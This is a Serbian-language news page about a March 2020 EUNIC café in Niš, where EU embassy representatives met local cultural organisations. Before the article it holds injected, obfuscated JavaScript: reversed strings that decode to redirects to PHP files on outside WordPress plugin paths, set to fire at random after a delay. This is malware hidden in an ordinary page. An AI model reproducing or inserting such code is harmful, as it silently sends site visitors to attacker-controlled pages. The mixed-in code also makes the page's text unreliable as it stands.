ambasadori_fo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_jovan_gojkovic

Predstavljanje stranim ambasadorima

Predstavnici osam stranih ambasada i kulturnih centara zemalja EU razgovarali su 3. marta 2020. godine sa predstavnicima niških ustanova i organizacija koje se bave kulturom u okviru EUNIC kafea.

Među učesnicima u razgovorima sa predstavnicima stranih ambasada je i predsednica Udruženja Marker Jovana Đorđević, koja je predstavila aktivnosti Markera, među kojima je u World music festival Merak.
Razlike u kulturi svakako postoje, ali nas sve povezuje ljubav prema umetnosti, muzici, pozorištu. Zato je ideja organizatora EUNIC kafea – Mladih ambasadora, bila da se pronađu načini za saradnju kroz razgovore sa lokalnim predstavnicima.
“Da vide kakve oni festivale i manifestacije organizuju i na koji način mogu da sarađuju. Kroz tu međukulturalnu, međusektorsku saradnju, kroz dovođenje različitih predavača, eksperata iz zemalja članica EU u Niš… I kroz povezivanje pozorišnih, filmskih i muzičkih festivala”, kaže Snežana Andrić, predsednica Mladih ambasadora.
“Nije reč samo o novcu, već možemo da dovedemo stručnjake, muzičare, pozorišne predstave, filmove iz naše zemlje… Sve što pokazuje kako to izgleda u našim zemljama i to mislim da može biti interesantno ljudima u Srbiji”, kaže Joakim Vern, zamenik ambasadora Ambasade Švedske. On u Srbiji živi 3,5 godine. I kaže da mu se ovdašnja kultura veoma sviđa, iako je različita u odnosu na kulturu njegove zemlje.
“Mladi ljudi su potencijal na kom želimo da radimo”, dodaje.
EUNIC klaster je skup kulturnih centara i ambasada EU i u Srbiji ga čine: Ambasada Švedske, Ambasada Finske, Ambasada Rumunije, Ambasada Mađarske, Ambasada Slovačke, Ambasada Bugarske, Ambasada Portugala, Delegacija EU, Gete Institut, Institut Servantes, Francuski institut, Helenski institut.

Add a Comment

Your email address will not be published. Required fields are marked *